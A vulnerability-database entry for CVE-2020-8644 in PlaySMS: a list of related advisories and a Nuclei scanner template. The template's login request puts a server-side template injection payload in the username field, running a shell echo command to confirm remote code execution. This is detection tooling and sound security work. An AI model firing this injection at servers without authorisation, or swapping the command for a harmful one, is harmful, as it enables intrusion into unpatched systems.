| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| PlaySMS Unauthenticated Template Injection Code Execution Exploit | 6 Apr 202000:00 | – | zdt | |
| CVE-2020-8644 | 5 Feb 202000:00 | – | attackerkb | |
| The vulnerability of the TPL template implementation in the web interface for SMS gateways and PlaySMS’ SMS messaging services allows a perpetrator to execute arbitrary code. | 1 Dec 202100:00 | – | bdu_fstec | |
| CVE-2020-8644 | 3 Apr 202014:31 | – | circl | |
| PlaySMS Server-Side Template Injection Vulnerability | 3 Nov 202100:00 | – | cisa_kev | |
| Unspecified Vulnerability in PlaySMS | 11 Feb 202000:00 | – | cnvd | |
| PlaySMS index.php Remote Code Execution (CVE-2020-8644) | 16 Nov 202100:00 | – | checkpoint_advisories | |
| CVE-2020-8644 | 5 Feb 202021:03 | – | cve | |
| CVE-2020-8644 | 5 Feb 202021:03 | – | cvelist | |
| PlaySMS 1.4.3 - Template Injection / Remote Code Execution | 11 Mar 202000:00 | – | exploitdb |
id: CVE-2020-8644
info:
name: playSMS <1.4.3 - Remote Code Execution
author: dbrwsky
severity: critical
description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
remediation: |
Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability.
reference:
- https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
- https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/
- https://nvd.nist.gov/vuln/detail/CVE-2020-8644
- http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html
- https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-8644
cwe-id: CWE-94
epss-score: 0.86689
epss-percentile: 0.99716
cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: playsms
product: playsms
tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce,vkev,vuln
http:
- raw:
- |
GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '4468-0202-EVC'
- type: status
status:
- 200
extractors:
- type: xpath
name: csrf
internal: true
xpath:
- /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input
attribute: value
part: body
# digest: 4b0a00483046022100ab9965901196bf120b293dd1999270655f90c05e1bb94dff4ee67af96f930d1b022100e3a48694cf6412bf94ae9b1854d86a27baf141222402831d38aaa58491d6dd81:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation